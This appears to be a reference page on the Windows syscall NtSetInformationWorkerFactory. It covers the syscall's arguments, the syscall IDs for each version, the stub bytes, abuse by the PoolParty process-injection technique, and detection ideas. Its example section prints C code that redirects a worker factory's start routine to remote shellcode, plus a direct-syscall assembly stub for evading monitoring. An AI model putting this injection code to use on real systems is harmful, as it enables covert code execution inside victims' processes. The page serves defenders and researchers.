ntoskrnl.exeT1055T1106

NtSetInformationWorkerFactory

Sets a configuration class on a worker factory — including, in some PoolParty variants, the StartRoutine that worker threads will execute.

Prototype

NTSTATUS NtSetInformationWorkerFactory(
  HANDLE                     WorkerFactoryHandle,
  WORKERFACTORYINFOCLASS     WorkerFactoryInformationClass,
  PVOID                      WorkerFactoryInformation,
  ULONG                      WorkerFactoryInformationLength
);

Arguments

Name	Type	Dir	Description
WorkerFactoryHandle	HANDLE	in	Handle to the worker factory. Requires WORKER_FACTORY_SET_INFORMATION access.
WorkerFactoryInformationClass	WORKERFACTORYINFOCLASS	in	Class selector — WorkerFactoryBasicInformation, WorkerFactoryThreadMinimum/Maximum, WorkerFactoryThreadCpuSets, WorkerFactoryAdjustThreadGoal, etc.
WorkerFactoryInformation	PVOID	in	Buffer whose layout depends on the class — e.g. a WORKER_FACTORY_BASIC_INFORMATION structure or a single ULONG.
WorkerFactoryInformationLength	ULONG	in	Size in bytes of the information buffer. Mismatched length returns STATUS_INFO_LENGTH_MISMATCH.

Syscall IDs by Windows version

Windows version	Syscall ID	Build
Win10 1507	0x183	win10-1507
Win10 1607	0x18C	win10-1607
Win10 1703	0x192	win10-1703
Win10 1709	0x195	win10-1709
Win10 1803	0x197	win10-1803
Win10 1809	0x198	win10-1809
Win10 1903	0x199	win10-1903
Win10 1909	0x199	win10-1909
Win10 2004	0x19F	win10-2004
Win10 20H2	0x19F	win10-20h2
Win10 21H1	0x19F	win10-21h1
Win10 21H2	0x1A1	win10-21h2
Win10 22H2	0x1A1	win10-22h2
Win11 21H2	0x1AA	win11-21h2
Win11 22H2	0x1AE	win11-22h2
Win11 23H2	0x1AE	win11-23h2
Win11 24H2	0x1B1	win11-24h2
Server 2016	0x18C	winserver-2016
Server 2019	0x198	winserver-2019
Server 2022	0x1A7	winserver-2022
Server 2025	0x1B1	winserver-2025

Kernel module

ntoskrnl.exe → NtSetInformationWorkerFactory

Related APIs

SetThreadpoolThreadMinimumSetThreadpoolThreadMaximumNtCreateWorkerFactoryNtQueryInformationWorkerFactoryNtShutdownWorkerFactory

Syscall stub

4C 8B D1            mov r10, rcx
B8 B1 01 00 00      mov eax, 0x1B1
F6 04 25 08 03 FE 7F 01   test byte ptr [0x7FFE0308], 1
75 03               jne short +3
0F 05               syscall
C3                  ret
CD 2E               int 2Eh
C3                  ret

Undocumented notes

The `WORKERFACTORYINFOCLASS` enum (defined in phnt/ntexapi.h) selects which field of the underlying `EWORKER_FACTORY` kernel structure is touched. Most classes — thread minimum/maximum, CPU sets, timeout adjustments — are mundane threadpool sizing knobs. Two are interesting: `WorkerFactoryBasicInformation` exposes (and on Set, can rewrite) the `StartRoutine` and `StartParameter` fields, and `WorkerFactoryThreadFlags` can mark workers as long-running or short-running, changing how aggressively the kernel reaps them.

Common malware usage

PoolParty 'Start Routine Overwrite' variants split the operation in two: first call NtCreateWorkerFactory with a benign StartRoutine (ntdll!TppWorkerThread is the obvious choice — it makes the factory look identical to a legitimate one in a brief snapshot), then call NtSetInformationWorkerFactory with `WorkerFactoryBasicInformation` to overwrite StartRoutine with the shellcode pointer just before posting work. The two-step pattern defeats simple cross-process detection that only inspects the StartRoutine at creation time. The same syscall is used to flip thread minimums down to zero in some sleep-evasion gadgets that abuse the threadpool to mimic the sleep behaviour of a benign idle process.

PoolParty PoC — 'Start Routine Overwrite' variant Sleep-mask gadgets using threadpool idle tuning (rare, anecdotal)

Detection opportunities

WorkerFactoryBasicInformation writes are rare in normal code — the ntdll threadpool sets the StartRoutine once at creation and never touches it again. A kernel callback that compares `EWORKER_FACTORY.StartRoutine` before and after this syscall, and flags any change in the field, is high-fidelity. Cross-process invocation amplifies the signal: legitimate threadpool tuning is always intra-process. Microsoft-Windows-Threading ETW emits some classes but not all; reliable coverage needs ObRegisterCallbacks on the WorkerFactory object type or a minifilter that observes the syscall in the kernel.

Direct syscall examples

cPoolParty StartRoutine overwrite

// Step 2 of the 'overwrite' variant — flip the entry point to shellcode
// after the factory was created with a benign decoy routine.
typedef struct _WORKER_FACTORY_BASIC_INFORMATION {
    LARGE_INTEGER Timeout;
    LARGE_INTEGER RetryTimeout;
    LARGE_INTEGER IdleTimeout;
    BOOLEAN       Paused;
    BOOLEAN       TimerSet;
    BOOLEAN       QueuedToExWorker;
    BOOLEAN       MayCreate;
    BOOLEAN       CreateInProgress;
    BOOLEAN       InsertedIntoQueue;
    BOOLEAN       Shutdown;
    ULONG         BindingCount;
    ULONG         ThreadMinimum;
    ULONG         ThreadMaximum;
    ULONG         PendingWorkerCount;
    ULONG         WaitingWorkerCount;
    ULONG         TotalWorkerCount;
    ULONG         ReleaseCount;
    LONGLONG      InfiniteWaitGoal;
    PVOID         StartRoutine;
    PVOID         StartParameter;
    HANDLE        ProcessId;
    SIZE_T        StackReserve;
    SIZE_T        StackCommit;
    NTSTATUS      LastThreadCreationStatus;
} WORKER_FACTORY_BASIC_INFORMATION;

WORKER_FACTORY_BASIC_INFORMATION info = {0};
NtQueryInformationWorkerFactory(hWf, WorkerFactoryBasicInformation,
                                &info, sizeof(info), NULL);
info.StartRoutine  = pRemoteShellcode;   // hijack
info.StartParameter = NULL;
NtSetInformationWorkerFactory(hWf, WorkerFactoryBasicInformation,
                              &info, sizeof(info));

asmx64 direct stub (Win11 24H2 SSN 0x1B1)

NtSetInformationWorkerFactory PROC
    mov  r10, rcx
    mov  eax, 1B1h     ; Win11 24H2 / Server 2025
    syscall
    ret
NtSetInformationWorkerFactory ENDP

MITRE ATT&CK mappings

Last verified: 2026-05-20